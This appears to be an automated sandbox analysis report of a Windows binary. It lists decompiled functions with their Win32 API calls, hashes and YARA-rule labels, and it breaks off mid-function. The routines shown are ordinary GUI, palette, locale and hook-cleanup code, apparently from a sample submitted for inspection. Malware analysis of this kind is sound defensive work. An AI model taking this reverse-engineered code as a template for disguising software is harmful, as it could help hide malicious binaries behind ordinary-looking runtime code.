Opcode ID: 8b7887d2222e676a413128fbd1c7e36af114313dfb6054b3d9e2a2fbc7481104
Instruction ID: cdbe363873c02c5fdcbc5fb3478ee405bad097bcf4dd95d0f07e6530c65ebb84
Opcode Fuzzy Hash: 8b7887d2222e676a413128fbd1c7e36af114313dfb6054b3d9e2a2fbc7481104
Instruction Fuzzy Hash: 92518370A00648AFEF10EBA9C881B9FB7E5AF45324F14466AF914E7393D73CAD418719

Uniqueness

Uniqueness Score: -1.00%

Function 00439F44, Relevance: 7.6, APIs: 5, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00439F44(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagPAINTSTRUCT _v84;
				intOrPtr _t55;
				void* _t64;
				struct HDC__* _t75;
				intOrPtr _t84;
				void* _t95;
				void* _t96;
				void* _t98;
				void* _t100;
				void* _t101;
				intOrPtr _t102;

				_t100 = _t101;
				_t102 = _t101 + 0xffffffb0;
				_v12 = __edx;
				_v8 = __eax;
				_t75 =  *(_v12 + 4);
				if(_t75 == 0) {
					_t75 = BeginPaint(E0043C1F4(_v8),  &_v84);
				}
				_push(_t100);
				_push(0x43a064);
				_push( *[fs:edx]);
				 *[fs:edx] = _t102;
				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
					_v20 = SaveDC(_t75);
					_v16 = 2;
					_t95 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
					if(_t95 >= 0) {
						_t96 = _t95 + 1;
						_t98 = 0;
						do {
							_t64 = E004141BC( *((intOrPtr*)(_v8 + 0x198)), _t98);
							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
									goto L11;
								} else {
									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
									if(_v16 != 1) {
										goto L11;
									}
								}
							} else {
								goto L11;
							}
							goto L12;
							L11:
							_t98 = _t98 + 1;
							_t96 = _t96 - 1;
						} while (_t96 != 0);
					}
					L12:
					if(_v16 != 1) {
						 *((intOrPtr*)( *_v8 + 0xb8))();
					}
					RestoreDC(_t75, _v20);
				} else {
					 *((intOrPtr*)( *_v8 + 0xb8))();
				}
				E0043A0A0(_v8, 0, _t75);
				_pop(_t84);
				 *[fs:eax] = _t84;
				_push(0x43a06b);
				_t55 = _v12;
				if( *((intOrPtr*)(_t55 + 4)) == 0) {
					return EndPaint(E0043C1F4(_v8),  &_v84);
				}
				return _t55;
			}

APIs

BeginPaint.USER32(00000000,?), ref: 00439F6A
SaveDC.GDI32(?), ref: 00439F9E
ExcludeClipRect.GDI32(?,?,?,?,?,00000000,0043A064), ref: 0043A000
RestoreDC.GDI32(?,?), ref: 0043A02A
EndPaint.USER32(00000000,?,0043A06B), ref: 0043A05E

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Paint$BeginClipExcludeRectRestoreSave
String ID:
API String ID: 3808407030-0
Opcode ID: 677d3bc3ac6830141a07811bca55a8183d9f1ac058024a275b3252339247bd1a
Instruction ID: 71dcd1ce9a3b38b748253e530e8be96a5cbb13f9e5cabd90298693508bd235b0
Opcode Fuzzy Hash: 677d3bc3ac6830141a07811bca55a8183d9f1ac058024a275b3252339247bd1a
Instruction Fuzzy Hash: C4418070A00204AFDB14DF99C884F9EB7F9EF4C308F1590AAE544A7362DB799D54CB19

Uniqueness

Uniqueness Score: -1.00%

Function 0043D8C0, Relevance: 7.6, APIs: 5, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0043D8C0(void* __eax) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr* _t14;
				intOrPtr* _t17;
				intOrPtr _t19;
				intOrPtr* _t21;
				intOrPtr* _t26;
				intOrPtr _t37;
				void* _t39;
				intOrPtr _t47;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t49 = _t51;
				_t52 = _t51 + 0xfffffff4;
				_t39 = __eax;
				if( *((short*)(__eax + 0x68)) == 0xffff) {
					return __eax;
				} else {
					_t14 =  *0x490fe4; // 0x492a9c
					_t17 =  *0x490fe4; // 0x492a9c
					_t19 =  *((intOrPtr*)( *_t17))(0xd,  *((intOrPtr*)( *_t14))(0xe, 1, 1, 1));
					_push(_t19);
					L00426A14();
					_v8 = _t19;
					_push(_t49);
					_push(0x43d980);
					_push( *[fs:eax]);
					 *[fs:eax] = _t52;
					_t21 =  *0x491278; // 0x492c08
					E00426A4C(_v8, E00453674( *_t21,  *((short*)(__eax + 0x68))));
					_t26 =  *0x491278; // 0x492c08
					E00426A4C(_v8, E00453674( *_t26,  *((short*)(_t39 + 0x68))));
					_push(0);
					_push(0);
					_push(0);
					_push(_v8);
					L00426A9C();
					_push( &_v16);
					_push(0);
					L00426AAC();
					_push(_v12);
					_push(_v16);
					_push(1);
					_push(_v8);
					L00426A9C();
					_pop(_t47);
					 *[fs:eax] = _t47;
					_push(0x43d987);
					_t37 = _v8;
					_push(_t37);
					L00426A1C();
					return _t37;
				}
			}

APIs

73451AB0.COMCTL32(00000000), ref: 0043D8F2

Part of subcall function 00426A4C: 73452140.COMCTL32(00433C0E,000000FF,00000000,0043D922,00000000,0043D980,?,00000000), ref: 00426A50

73451680.COMCTL32(00433C0E,00000000,00000000,00000000,00000000,0043D980,?,00000000), ref: 0043D946
73451710.COMCTL32(00000000,?,00433C0E,00000000,00000000,00000000,00000000,0043D980,?,00000000), ref: 0043D951
73451680.COMCTL32(00433C0E,00000001,?,0043D9E9,00000000,?,00433C0E,00000000,00000000,00000000,00000000,0043D980,?,00000000), ref: 0043D964
73451F60.COMCTL32(00433C0E,0043D987,0043D9E9,00000000,?,00433C0E,00000000,00000000,00000000,00000000,0043D980,?,00000000), ref: 0043D97A

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: 7345173451680$7345171073452140
String ID:
API String ID: 821207058-0
Opcode ID: 7a2de65e10078dbb25f42b40a68a6e407dc82c236c6e759e206e8d345538ab80
Instruction ID: 8ea4806a52818ba835e40b660a0f20c3d7c71dc04e647954a84ca1ed1576d89d
Opcode Fuzzy Hash: 7a2de65e10078dbb25f42b40a68a6e407dc82c236c6e759e206e8d345538ab80
Instruction Fuzzy Hash: F4215474700214EFDB10EBA9DC82F5973F8EB49704F5141A6F904EB2A1D675AE40CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00424C08, Relevance: 7.6, APIs: 5, Instructions: 66
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00424C08(int __eax) {
				int _t21;
				signed int _t29;
				char _t34;
				int _t42;
				int _t43;
				struct HDC__* _t44;
				intOrPtr _t45;

				_t21 = __eax;
				_t42 = __eax;
				_t45 =  *((intOrPtr*)(__eax + 0x28));
				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t45 + 0x10) == 0 &&  *((intOrPtr*)(_t45 + 0x14)) != 0) {
					_t22 =  *((intOrPtr*)(_t45 + 0x14));
					if( *((intOrPtr*)(_t45 + 0x14)) ==  *((intOrPtr*)(_t45 + 8))) {
						E00423588(_t22);
					}
					_t21 = E004211EC( *((intOrPtr*)(_t45 + 0x14)), 1 <<  *(_t45 + 0x3e));
					_t43 = _t21;
					 *(_t45 + 0x10) = _t43;
					if(_t43 == 0) {
						_t44 = E00420AFC(GetDC(0));
						if( *((char*)(_t45 + 0x71)) != 0) {
							L9:
							_t34 = 1;
						} else {
							_t29 = GetDeviceCaps(_t44, 0xc);
							if(_t29 * GetDeviceCaps(_t44, 0xe) < ( *(_t45 + 0x2a) & 0x0000ffff) * ( *(_t45 + 0x28) & 0x0000ffff)) {
								goto L9;
							} else {
								_t34 = 0;
							}
						}
						 *((char*)(_t45 + 0x71)) = _t34;
						if(_t34 != 0) {
							 *(_t45 + 0x10) = CreateHalftonePalette(_t44);
						}
						_t21 = ReleaseDC(0, _t44);
						if( *(_t45 + 0x10) == 0) {
							 *((char*)(_t42 + 0x30)) = 1;
							return _t21;
						}
					}
				}
				return _t21;
			}

0x00424c08
0x00424c0c
0x00424c0e
0x00424c15
0x00424c2f
0x00424c35
0x00424c37
0x00424c37
0x00424c4e
0x00424c53
0x00424c55
0x00424c5a
0x00424c68
0x00424c6e
0x00424c97
0x00424c97
0x00424c70
0x00424c73
0x00424c91
0x00000000
0x00424c93
0x00424c93
0x00424c93
0x00424c91
0x00424c99
0x00424c9e
0x00424ca6
0x00424ca6
0x00424cac
0x00424cb5
0x00424cb7
0x00000000
0x00424cb7
0x00424cb5
0x00424c5a
0x00424cbf

APIs

GetDC.USER32(00000000), ref: 00424C5E
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00424C73
GetDeviceCaps.GDI32(00000000,0000000E), ref: 00424C7D
CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0042375F,00000000,004237EB), ref: 00424CA1
ReleaseDC.USER32 ref: 00424CAC

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDevice$CreateHalftonePaletteRelease
String ID:
API String ID: 2404249990-0
Opcode ID: d4018df0410e552c160e27d517ea2bbddef88c18dbff2cb0cbe3ca7ce4171e75
Instruction ID: 3c3e503f7964a019047a84334c958d4ec1a2b305e00e0b2a989410755a2eba74
Opcode Fuzzy Hash: d4018df0410e552c160e27d517ea2bbddef88c18dbff2cb0cbe3ca7ce4171e75
Instruction Fuzzy Hash: 2911A531702279AADB20DF6AE4417EA3AD0EB51355F410126FC049A6C1D7BC9890C3AD

Uniqueness

Uniqueness Score: -1.00%

Function 00452940, Relevance: 7.6, APIs: 5, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00452940(void* __eax) {
				void* _t16;
				void* _t39;
				signed int _t42;

				_t16 = __eax;
				_t39 = __eax;
				if(( *(__eax + 0x1c) & 0x00000010) == 0 &&  *0x476b50 != 0) {
					_t16 = E0043C4F8(__eax);
					if(_t16 != 0) {
						_t42 = GetWindowLongA(E0043C1F4(_t39), 0xffffffec);
						if( *((char*)(_t39 + 0x2e0)) != 0 ||  *((char*)(_t39 + 0x2e2)) != 0) {
							if((_t42 & 0x00080000) == 0) {
								SetWindowLongA(E0043C1F4(_t39), 0xffffffec, _t42 | 0x00080000);
							}
							return  *0x476b50(E0043C1F4(_t39),  *((intOrPtr*)(_t39 + 0x2e4)),  *((intOrPtr*)(_t39 + 0x2e1)),  *0x00476BD4 |  *0x00476BDC);
						} else {
							SetWindowLongA(E0043C1F4(_t39), 0xffffffec, _t42 & 0xfff7ffff);
							return RedrawWindow(E0043C1F4(_t39), 0, 0, 0x485);
						}
					}
				}
				return _t16;
			}

0x00452940
0x00452942
0x00452948
0x0045295d
0x00452964
0x00452979
0x00452982
0x00452993
0x004529a6
0x004529a6
0x00000000
0x004529e8
0x004529f9
0x00000000
0x00452a0f
0x00452982
0x00452964
0x00452a16

APIs

GetWindowLongA.USER32 ref: 00452974
SetWindowLongA.USER32 ref: 004529A6
SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,004505AC), ref: 004529E0
SetWindowLongA.USER32 ref: 004529F9
RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,004505AC), ref: 00452A0F

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$AttributesLayeredRedraw
String ID:
API String ID: 1758778077-0
Opcode ID: 087e273c3aca4a6a58b0e38cb7cb75d1632ce92489a7994197e4ca98f679ba6e
Instruction ID: 7ae8c400807931af7430558d2d8102ea1d42c1aca7f9b541f5a91e1d8d5fe38c
Opcode Fuzzy Hash: 087e273c3aca4a6a58b0e38cb7cb75d1632ce92489a7994197e4ca98f679ba6e
Instruction Fuzzy Hash: 361158A0A0469116DB10AE799C89B97164C1B07319F14157BBC55FF2D3CB6C9848D77C

Uniqueness

Uniqueness Score: -1.00%

Function 0041D2B8, Relevance: 7.6, APIs: 5, Instructions: 60
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041D2B8(intOrPtr _a4, short _a6, intOrPtr _a8) {
				struct _WNDCLASSA _v44;
				struct HINSTANCE__* _t6;
				CHAR* _t8;
				struct HINSTANCE__* _t9;
				int _t10;
				void* _t11;
				struct HINSTANCE__* _t13;
				CHAR* _t14;
				struct HINSTANCE__* _t19;
				CHAR* _t20;
				struct HWND__* _t22;

				_t6 =  *0x492714; // 0x400000
				 *0x4764d0 = _t6;
				_t8 =  *0x4764e4; // 0x41d2a8
				_t9 =  *0x492714; // 0x400000
				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
				asm("sbb eax, eax");
				_t11 = _t10 + 1;
				if(_t11 == 0 || L00406D8C != _v44.lpfnWndProc) {
					if(_t11 != 0) {
						_t19 =  *0x492714; // 0x400000
						_t20 =  *0x4764e4; // 0x41d2a8
						UnregisterClassA(_t20, _t19);
					}
					RegisterClassA(0x4764c0);
				}
				_t13 =  *0x492714; // 0x400000
				_t14 =  *0x4764e4; // 0x41d2a8
				_t22 = CreateWindowExA(0x80, _t14, 0x41d368, 0x80000000, 0, 0, 0, 0, 0, 0, _t13, 0);
				if(_a6 != 0) {
					SetWindowLongA(_t22, 0xfffffffc, E0041D1FC(_a4, _a8));
				}
				return _t22;
			}

APIs

GetClassInfoA.USER32 ref: 0041D2D9
UnregisterClassA.USER32 ref: 0041D302
RegisterClassA.USER32 ref: 0041D30C
CreateWindowExA.USER32 ref: 0041D33A
SetWindowLongA.USER32 ref: 0041D357

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Class$Window$CreateInfoLongRegisterUnregister
String ID:
API String ID: 3404767174-0
Opcode ID: 241767791042952b3840cb5b633aa9e02eb2e9207c04c2aadd6e01d35702f1e5
Instruction ID: 0b43b3726ff93901adb79ee408722d0e4703594a24f2b397aff69cbb08d7ac49
Opcode Fuzzy Hash: 241767791042952b3840cb5b633aa9e02eb2e9207c04c2aadd6e01d35702f1e5
Instruction Fuzzy Hash: 7F0188B1A001047BCA10EBA8DD81F9A33ADEB09308F104277F918F72D2D775E948876E

Uniqueness

Uniqueness Score: -1.00%

Function 00421154, Relevance: 7.6, APIs: 5, Instructions: 55
windowCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00421154(void* __eax) {
				char _v5;
				struct HDC__* _v12;
				struct HPALETTE__* _t21;
				struct HPALETTE__* _t25;
				void* _t28;
				intOrPtr _t35;
				void* _t37;
				void* _t39;
				intOrPtr _t40;

				_t37 = _t39;
				_t40 = _t39 + 0xfffffff8;
				_t28 = __eax;
				_v5 = 0;
				if( *0x492a28 == 0) {
					return _v5;
				} else {
					_v12 = GetDC(0);
					_push(_t37);
					_push(0x4211da);
					_push( *[fs:edx]);
					 *[fs:edx] = _t40;
					if(GetDeviceCaps(_v12, 0x68) >= 0x10) {
						_t21 =  *0x492a28; // 0xc40806be
						GetPaletteEntries(_t21, 0, 8, _t28 + 4);
						_t25 =  *0x492a28; // 0xc40806be
						GetPaletteEntries(_t25, 8, 8, _t28 + ( *(_t28 + 2) & 0x0000ffff) * 4 - 0x1c);
						_v5 = 1;
					}
					_pop(_t35);
					 *[fs:eax] = _t35;
					_push(0x4211e1);
					return ReleaseDC(0, _v12);
				}
			}

0x00421155
0x00421157
0x0042115b
0x0042115d
0x00421168
0x004211e8
0x0042116a
0x00421171
0x00421176
0x00421177
0x0042117c
0x0042117f
0x00421190
0x0042119a
0x004211a0
0x004211b2
0x004211b8
0x004211bd
0x004211bd
0x004211c3
0x004211c6
0x004211c9
0x004211d9
0x004211d9

APIs

GetDC.USER32(00000000), ref: 0042116C
GetDeviceCaps.GDI32(?,00000068), ref: 00421188
GetPaletteEntries.GDI32(C40806BE,00000000,00000008,?), ref: 004211A0
GetPaletteEntries.GDI32(C40806BE,00000008,00000008,?), ref: 004211B8
ReleaseDC.USER32 ref: 004211D4

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: EntriesPalette$CapsDeviceRelease
String ID:
API String ID: 3128150645-0
Opcode ID: 260c98c995fdc23318bed2531b7113e69772b3d183c6f94793780469d0ee4c5f
Instruction ID: 4124ae89fc3ff9af0de6bfb709674fa9922fe0bc218d5222fbff8a0036b8e124
Opcode Fuzzy Hash: 260c98c995fdc23318bed2531b7113e69772b3d183c6f94793780469d0ee4c5f
Instruction Fuzzy Hash: 8C114871748340BEEB00CBE59C82F697BE8E718724F5040A7F604DA2C1CABAA414C328

Uniqueness

Uniqueness Score: -1.00%

Function 00461F8C, Relevance: 7.6, APIs: 5, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00461F8C(void* __eax) {
				struct HDC__* _v8;
				int _t13;
				void* _t25;
				intOrPtr _t32;
				int _t35;
				intOrPtr _t37;
				intOrPtr _t39;

				_t37 = _t39;
				_t25 = __eax;
				if( *((char*)(__eax + 0x2e8)) == 1) {
					return __eax;
				} else {
					_v8 = GetDC(0);
					_push(_t37);
					_push(0x462011);
					_push( *[fs:eax]);
					 *[fs:eax] = _t39;
					_t13 = GetDeviceCaps(_v8, 0x5a);
					_t35 = MulDiv(E0041F684( *((intOrPtr*)(_t25 + 0x68))), _t13, 0x48);
					 *(_t25 + 0x2b0) = _t35;
					E0045F988(_t25, MulDiv(_t35, 0x78, 0x64));
					 *((intOrPtr*)(_t25 + 0x2e4)) =  *((intOrPtr*)(_t25 + 0x234));
					_pop(_t32);
					 *[fs:eax] = _t32;
					_push(0x462018);
					return ReleaseDC(0, _v8);
				}
			}

0x00461f8d
0x00461f92
0x00461f9b
0x0046201c
0x00461f9d
0x00461fa4
0x00461fa9
0x00461faa
0x00461faf
0x00461fb2
0x00461fbd
0x00461fd1
0x00461fd3
0x00461fe7
0x00461ff2
0x00461ffa
0x00461ffd
0x00462000
0x00462010
0x00462010

APIs

GetDC.USER32(00000000), ref: 00461F9F
GetDeviceCaps.GDI32(?,0000005A), ref: 00461FBD

Part of subcall function 0041F684: MulDiv.KERNEL32(00000000,00000048,?), ref: 0041F695

MulDiv.KERNEL32(00000000,00000000,?), ref: 00461FCC
MulDiv.KERNEL32(00000000,00000078,00000064), ref: 00461FDE
ReleaseDC.USER32 ref: 0046200B

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDeviceRelease
String ID:
API String ID: 127614599-0
Opcode ID: efaf82620a21a9afdda7de621e26233fa48b3437332e6790b93935ef920589f7
Instruction ID: ce152b9841b61194860a01a7d141dbec5ac039d8fc94144150a278fa3c5b6213
Opcode Fuzzy Hash: efaf82620a21a9afdda7de621e26233fa48b3437332e6790b93935ef920589f7
Instruction Fuzzy Hash: E301C0716847407EEB00EFA58C46B5A7698DB09714F1100BAFA08AB282D6B95C00C768

Uniqueness

Uniqueness Score: -1.00%

Function 00409C38, Relevance: 7.6, APIs: 5, Instructions: 50
threadCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00409C38(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x409ccf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E004099B0(GetThreadLocale(), 0x409ce4, 0x100b,  &_v8);
				_t29 = E0040879C(0x409ce4, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E00409B84, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x49281c;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E00409BC0, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E00409CD6);
				return E00404348( &_v8);
			}

APIs

GetThreadLocale.KERNEL32(?,00000000,00409CCF,?,?,00000000), ref: 00409C50

Part of subcall function 004099B0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 004099CE

GetThreadLocale.KERNEL32(00000000,00000004,00000000,00409CCF,?,?,00000000), ref: 00409C80
EnumCalendarInfoA.KERNEL32(Function_00009B84,00000000,00000000,00000004), ref: 00409C8B
GetThreadLocale.KERNEL32(00000000,00000003,00000000,00409CCF,?,?,00000000), ref: 00409CA9
EnumCalendarInfoA.KERNEL32(Function_00009BC0,00000000,00000000,00000003), ref: 00409CB4

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: 316503a768b29b2598b76e2056b121bc60b75b7765209c54ef7d6335e79560c6
Instruction ID: 45d655dda3edaeb237038c5d9ca3a385cb1ac1a88f938bcd0c00c12fcdd897c3
Opcode Fuzzy Hash: 316503a768b29b2598b76e2056b121bc60b75b7765209c54ef7d6335e79560c6
Instruction Fuzzy Hash: 8A01D4B56042056AE701B7618D13B5A719CEB85B28F22413BF901B66C6D67C9E0081AC

Uniqueness

Uniqueness Score: -1.00%

Function 00453F40, Relevance: 7.5, APIs: 5, Instructions: 25
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00453F40() {
				void* _t2;
				void* _t5;
				void* _t8;
				struct HHOOK__* _t10;

				if( *0x492c1c != 0) {
					_t10 =  *0x492c1c; // 0x0
					UnhookWindowsHookEx(_t10);
				}
				 *0x492c1c = 0;
				if( *0x492c20 != 0) {
					_t2 =  *0x492c18; // 0x0
					SetEvent(_t2);
					if(GetCurrentThreadId() !=  *0x492c14) {
						_t8 =  *0x492c20; // 0x0
						WaitForSingleObject(_t8, 0xffffffff);
					}
					_t5 =  *0x492c20; // 0x0
					CloseHandle(_t5);
					 *0x492c20 = 0;
					return 0;
				}
				return 0;
			}

0x00453f47
0x00453f49
0x00453f4f
0x00453f4f
0x00453f56
0x00453f62
0x00453f64
0x00453f6a
0x00453f7a
0x00453f7e
0x00453f84
0x00453f84
0x00453f89
0x00453f8f
0x00453f96
0x00000000
0x00453f96
0x00453f9b

APIs

UnhookWindowsHookEx.USER32(00000000), ref: 00453F4F
SetEvent.KERNEL32(00000000,004561EA,00000000,004552C7,?,?,dZG,00000001,00455387,?,?,?,dZG), ref: 00453F6A
GetCurrentThreadId.KERNEL32 ref: 00453F6F
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,004561EA,00000000,004552C7,?,?,dZG,00000001,00455387,?,?,?,dZG), ref: 00453F84
CloseHandle.KERNEL32(00000000,00000000,004561EA,00000000,004552C7,?,?,dZG,00000001,00455387,?,?,?,dZG), ref: 00453F8F

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
String ID:
API String ID: 2429646606-0
Opcode ID: e1f3ffdced574a68e03de45e4cc2b7672e9f46ba86cacc15a492fac6642ab509
Instruction ID: 8f998089f3f5830ceb25d3d6760d809e37c77c1beacc2c4a2821b6e1f50ac112
Opcode Fuzzy Hash: e1f3ffdced574a68e03de45e4cc2b7672e9f46ba86cacc15a492fac6642ab509
Instruction Fuzzy Hash: 39F09872A01100AAC711EB79DE8AE1A32E4A72831AB05497BB115E31A2CFB8D595CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 004563B8, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 289
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004563B8(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct tagPOINT _v32;
				char _v33;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				struct HWND__* _v52;
				intOrPtr _v56;
				char _v60;
				struct tagRECT _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				int _v88;
				int _v92;
				intOrPtr _v96;
				char _v100;
				struct tagRECT _v116;
				char _v132;
				intOrPtr _v136;
				char _v140;
				char _v144;
				char _v148;
				struct HWND__* _t135;
				struct HWND__* _t171;
				intOrPtr _t193;
				char _t199;
				intOrPtr _t223;
				intOrPtr _t227;
				intOrPtr* _t262;
				intOrPtr _t281;
				intOrPtr _t282;
				intOrPtr _t284;
				intOrPtr _t290;
				intOrPtr* _t319;
				intOrPtr _t320;
				void* _t327;

				_t326 = _t327;
				_v144 = 0;
				_v148 = 0;
				asm("movsd");
				asm("movsd");
				_v8 = __eax;
				_t281 =  *0x44c43c; // 0x44c440
